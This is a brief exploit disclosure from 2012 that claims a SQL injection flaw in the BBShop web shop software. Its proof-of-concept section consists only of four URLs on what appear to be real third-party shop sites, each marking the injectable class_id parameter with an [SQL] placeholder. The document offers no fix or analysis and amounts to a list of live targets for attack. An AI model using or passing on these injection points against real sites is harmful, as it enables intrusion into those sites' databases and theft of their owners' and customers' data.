########################################## # Exploit Title: BBShop Sql Injection Vulnerabilitiy # Google Dork: n/a # Vendor : http://zzem.co.kr # Date: march - 14 - 2012 # Author: AMC - http://Codes.us.to ########################################## PoC: http://www.lookcas.com/shop/shop/main.php?page=view_class&class_id=[SQL] http://www.tipnara.com/bbshop/shop/main.php?page=view_class&class_id=[SQL] http://www.miraesusan.co.kr/bbshop/shop/main.php?page=view_class&class_id=[SQL] http://www.songeee.com/shop/shop/main.php?page=view_class&class_id=[SQL]